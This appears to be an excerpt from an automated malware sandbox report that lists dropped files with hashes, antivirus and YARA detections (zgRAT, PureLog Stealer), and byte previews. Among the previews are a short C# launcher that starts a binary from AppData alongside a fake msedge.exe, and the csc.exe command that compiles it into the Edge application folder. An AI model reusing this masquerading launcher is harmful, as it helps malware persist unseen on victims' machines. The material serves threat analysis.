                                                                                                                                                                                                                                                                                    Size (bytes):25
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.133660689688185
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:gkpzMK:/B
                                                                                                                                                                                                                                                                                    MD5:AEB8D51416B3B24BF7DB71352FE75727
                                                                                                                                                                                                                                                                                    SHA1:24CB546A22B03DBF99A3FCA67CB53F375502141B
                                                                                                                                                                                                                                                                                    SHA-256:DF1E5DB22E40DA5C41115E680EEC9F55D71F121F8FB14A6B6A149DBBE8712B08
                                                                                                                                                                                                                                                                                    SHA-512:ACE270D734DA00623A8B8A0B1E66B37C703696E08D917DF9AFD00E3FE94F5B61A8F06846F6F2F048119D79E82F0FEFE26A946D1692C0029ABF82ABB28635BEF9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:jX2lsD6uWTmnxDpuKRDhMepx2
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):402
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.973722722163131
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLYZvlaiFkD:JNVQIbSfhWLzIiFkMSfh0vl7FkD
                                                                                                                                                                                                                                                                                    MD5:ED2F688C89C743CE85A8FBD438D9F2BC
                                                                                                                                                                                                                                                                                    SHA1:9E1536A60CCAE9FC378D1F313A9080850310CFDC
                                                                                                                                                                                                                                                                                    SHA-256:06C088E879C43EFE882DC3A7B36CD8473DE3058276095E249AB455A4A9D3E0E2
                                                                                                                                                                                                                                                                                    SHA-512:DA7D478D48C3D5E14A8406481AC33DC0673E376294B39B665510C98326EEE8EE0FA61BC8E15674A29DDF02185975DDE561A1B2069120DD7BD5FF9F6D54AEA467
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\winlogon.exe"); } catch { } }).Start();. }.}.
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):264
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.163065519218824
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oFi23faGUuHn:Hu7L//TRRzscQjZiiHn
                                                                                                                                                                                                                                                                                    MD5:6B77729FDAB667D15E9272A51F3E6C92
                                                                                                                                                                                                                                                                                    SHA1:335A8979068EDBE6A1E5880E04067CC6B90A0B46
                                                                                                                                                                                                                                                                                    SHA-256:49F5D076EFC88097030B8AEA0015E6E3DEBE36707993BD34537E272CF9162DFF
                                                                                                                                                                                                                                                                                    SHA-512:D9CA209F696F4B4DF14F94788E3EE5D7EC08D99ADF7D20EA28B9F319E63F000D9A7012405D4CDE2A5D0C4535445E50CD11FAEF37B54BBB67460F53C69FD5E6F9
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\v0obd3fi\v0obd3fi.0.cs"
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (328), with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):749
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.253807606650078
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:apI/u7L//TRRzscQjZiiHuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/VRzst9iKax5DqBVKVrdFAMBJj
                                                                                                                                                                                                                                                                                    MD5:73D111B03ECB47207EC829FBD54562A7
                                                                                                                                                                                                                                                                                    SHA1:21F5FD6D6F0D10C63EFF731321FA33ACC3CDB10D
                                                                                                                                                                                                                                                                                    SHA-256:E847914522EA676EDBC27E1EE719ADB8CA42ADBA70F2521CDA8A08E896C0905D
                                                                                                                                                                                                                                                                                    SHA-512:858316320D8FBBCAC4B92AF2A05D121D5E41A2F8DBC77C51864B944C4B149476D0A5ADB2844CB7F70898FCE81BDDD5D243DEE6B592BF0B771B5A9AD42F0B7B33
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\v0obd3fi\v0obd3fi.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (508), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):508
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.860735931453882
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:yfUxAScATqH66vCVdMUZYWtSa4oJ5NUKpeamjB:yiqaIE5YWtSpoJ5NUK7mjB
                                                                                                                                                                                                                                                                                    MD5:9056CD5D033B98BCF70E52E33DA2A0F4
                                                                                                                                                                                                                                                                                    SHA1:6191797562E6085D4C7A84341C0B99F16077F822
                                                                                                                                                                                                                                                                                    SHA-256:9D570DA3B67E286FA64BD3C5ADFD3384B566D8A49BFD712CCE44EF7CC45F372D
                                                                                                                                                                                                                                                                                    SHA-512:B7CFDE71D3E1DC0BAF3F27BDF65669ED5C77C051ED2105DD5CE2B3DD77E2E1C1D10E5D1F6C8ADE118186BA91F64B421F2EF03CAC170C50CA5FDDFC64D7D190F2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:zpJ72CEj00pHMDJF21PlAfxzgQ30bMFVgHFpNZlKcnyGeBb1EDaxlIeT2TbmINHnvUlF8e1dPFIWqqVeyCvXwRuYmvw388BOgKVKaW2kM6ig9HnL86yFcu1dkNcMr8fRD30fVLEcJKLztNYfIl4BK5wvT1jM3q3NbQcGQHzx2W6RiBtWz7EGDdGHHEMel1idR7YduROBvHJy9eNSINX5lwJ7KV9M4VMAxc9lnQlhtDV6USIm14VXen1fyaSZSCGZ5JBgelp2mzMibMn1NWUAAyfKlexM7LPq75BLRlHPOdvoaTDlxbM5sFZGn159yc5akflfLbklPEvhC1tRbMZg9T81g4iapHbwhVD4shZV0kqnT2EvHoimCYaRgt9Q3K6Hn99qxyj3wEpZnViozwSBjyuJ5wY9hIbqniAU2Y7SFp08sAnLKVaG14izO0uBajVnm9vEVOvbyA637wa4INyMrUytAKFCn62fTMVtPiz6k9R18o1cZz2NvJ5RLCEK
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1963008
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.552676792704024
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
                                                                                                                                                                                                                                                                                    MD5:ABD343DF6FBD7334D617F76F6F050E3C
                                                                                                                                                                                                                                                                                    SHA1:864A1DA1AF2E7B5049B8E7A93402D2BDED518681
                                                                                                                                                                                                                                                                                    SHA-256:1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
                                                                                                                                                                                                                                                                                    SHA-512:56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\winlogon.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\winlogon.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)...*...8I...(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....
                                                                                                                                                                                                                                                                                    Process:C:\Windows\Speech\rtcore64.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):564224
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.078525625168558
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12288:MF2Q7BSInp+aNY5x50MbSVYPXJ7xud0RoV:Mlp+yYX5pbaww0Ro
                                                                                                                                                                                                                                                                                    MD5:451FD926F7D2920970013E3B17A7FD47
                                                                                                                                                                                                                                                                                    SHA1:F5D3D0467DAE55689F311295D2E5B506A6F3D8F9
                                                                                                                                                                                                                                                                                    SHA-256:2501E27B6F9BECE9926CD1E5BA631B084681D932AB30B0B79C5EE95ED8A61B2F
                                                                                                                                                                                                                                                                                    SHA-512:57A5813DFEFC114A7544502EE83C2B09A009A0A2220315AE5A04E3F62CA657962166847943B5901700BB2749928124E70D17F74ED8A5E19A7A86D7085738D0E4
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................S................s...........4.......4......4...........4.....4.....Rich...........PE..L......f...........!...&..................................................................@.........................P...x.......<...............................d... ...............................`...@...............P............................text............................... ..`.rdata..fj.......l..................@..@.data..............................@....reloc..d...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):32256
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.631194486392901
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                                                                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                                                                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                                                                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                                                                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):23552
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.519109060441589
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                                                                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                                                                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                                                                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                                                                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):85504
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.8769270258874755
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                                                                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                                                                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                                                                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                                                                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.645950918301459
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                                                                                                                                    MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                                                                                                                                    SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                                                                                                                                    SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                                                                                                                                    SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):69632
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.932541123129161
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                                                                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                                                                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                                                                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                                                                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):233472
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.342628803287784
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:fQCyKBU+DkgSZxPOs82L7a3Mum6kJfADWPlA8lxPMvt6L1Hke0tjwKswX:fQCYtj9FAiNA8l2V6lkeCjwKs
                                                                                                                                                                                                                                                                                    MD5:6E90C863F1166A43E590204D055EE08A
                                                                                                                                                                                                                                                                                    SHA1:C02E42892470124601B5B1126B2C780BB0F2C502
                                                                                                                                                                                                                                                                                    SHA-256:54ABE3EF576221E0D1341371378F36E9F63E3F5576069573910FCAD5CF43B24F
                                                                                                                                                                                                                                                                                    SHA-512:14A38A5B20B4972956349D4718B9A6ED8286C46C3758A28ACC382B369B38DBC67F2D9019A95C26430E1D3C77088AD47AF0EA96853E56ECCB3FDAFE36F289665C
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...k.l.p...l..f...l..h...l..C...l..d...)...i...b...y...qk..c...qk..c...qk..c...Richb...................PE..d...X..f.........."....(............H..........@..........................................`..................................................O..h...............H...............4.......p...............................@............... ............................text...o........................... ..`.rdata.. ...........................@..@.data....>...........d..............@....pdata..H............p..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2284739
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.490456730492454
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24576:2TbBv5rUyXVRCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKY:IBJ1LLvax4Gmhscse1D
                                                                                                                                                                                                                                                                                    MD5:C85ABE0E8C3C4D4C5044AEF6422B8218
                                                                                                                                                                                                                                                                                    SHA1:F9A4DACEBF1DD80F54DA8C8AFE1DEDDAC99D381D
                                                                                                                                                                                                                                                                                    SHA-256:7C388F4215D04EEA63A7D5BD9F3CADE715F285EA72DE0E43192FC9F34BAF7C52
                                                                                                                                                                                                                                                                                    SHA-512:082F4924C624D9B35DFF185B582278E032D3FF230E48739D796BBA250B0807C498EF1B52F78B864AADB35DB0F65463035110C02B7D92DE4FB0A86902CCAD7CB5
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):370176
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.990824056166435
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:6144:uFEE0IJwfawOmaDOEFI2FSCsPOjygLxkxweCyxORzX7rIh0uUWJZtwCiDMf+egqx:uFElvH+KEFLSvVAL7rqDtAIfiq4
                                                                                                                                                                                                                                                                                    MD5:D6EDF37D68DA356237AE14270B3C7A1A
                                                                                                                                                                                                                                                                                    SHA1:37FCDB2A0FB6949E710A7E64E181993FD4CBCB29
                                                                                                                                                                                                                                                                                    SHA-256:D5F6F3242C601E85EEDFF04CD45947F7890E908E51C57F90521EED59C8088B4B
                                                                                                                                                                                                                                                                                    SHA-512:01CE470A7D19FB9E139C038FF5DD30B6D85409A87B298AE9D3106B5E2EF8712C0D7FC7E4587886DEE47DB040033B9D2D591A0CAFC0001461A0DC07338F0BAA21
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W.f................................. ........@.. ....................................`.................................l...O...................................4................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......p................................................................9m.[...{....V._A.._..X..[m.'..#Q.......[..+H.<..fZ..|.....m&......y..;KR....7..S..k.m?.8..ID&.!0%N!\.\..L^...0\.....j|.M.........M.;.*.q..UO..!'..%. d.E.u......Q-w.$I...X...0d......f.$|(.gE.N...3.J..*T.?.q..\.yX:..W6...t..d.......(.E..n..K.J050....=I3-.x.p.......&{#.,..Vxb.G\.=$...}.C.fgl..`.I.yZ..?.$.'J)....K..............TV.@,...r..q....+....2<ILOS....n<..o.T.~.d:... ..z.>...._.H...
                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\curl.exe
